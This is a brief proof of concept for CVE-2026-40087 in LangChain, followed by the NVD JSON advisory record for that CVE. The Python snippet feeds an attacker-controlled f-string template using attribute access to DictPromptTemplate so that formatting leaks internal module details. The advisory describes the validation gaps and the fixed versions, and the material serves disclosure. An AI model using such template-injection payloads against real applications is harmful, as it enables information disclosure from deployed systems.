CVE-2026-40087

# PoC for CVE-2026-40087: LangChain f-string Validation Bypass # This demonstrates how attribute access in DictPromptTemplate # can lead to unintended information disclosure. from langchain_core.prompts import DictPromptTemplate # Scenario: An attacker controls the template string # Vulnerable versions allow attribute access bypassing validation malicious_template = "Extracted Data: {input.__class__.__module__}" # Create a prompt template instance using the vulnerable class prompt = DictPromptTemplate.from_template(malicious_template) # Input data usually provided by the application context user_input = {"input": "harmless_data"} # Formatting the prompt triggers the evaluation of the expression try: result = prompt.format(**user_input) print(f"PoC Result: {result}") # Output might reveal internal module structure or sensitive attributes except Exception as e: print(f"Execution blocked or error: {e}")

{"cve": {"id": "CVE-2026-40087", "sourceIdentifier": "[email protected]", "published": "2026-04-09T20:16:27.400", "lastModified": "2026-04-16T20:48:43.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangChain is a framework for building agents and LLM-powered applications. Prior to 0.3.84 and 1.2.28, LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting. Second, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. In this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime. This vulnerability is fixed in 0.3.84 and 1.2.28."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langchain_core:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.3.84", "matchCriteriaId": "0274A49C-E34C-4B49-B47F-025C54462E88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langchain_core:*:*:*:*:*:python:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.2.28", "matchCriteriaId": "199ECAF5-9D89-4DDC-B084-F3A9CC0A36AA"}]}]}], "references": [{"url": "https://github.com/langchain-ai/langchain/commit/6bab0ba3c12328008ddca3e0d54ff5a6151cd27b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/langchain-ai/langchain/commit/af2ed47c6f008cdd551f3c0d87db3774c8dfe258", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/langchain-ai/langchain/pull/36612", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/langchain-ai/langchain/pull/36613", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.84", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.28", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-926x-3r5x-gfhw", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}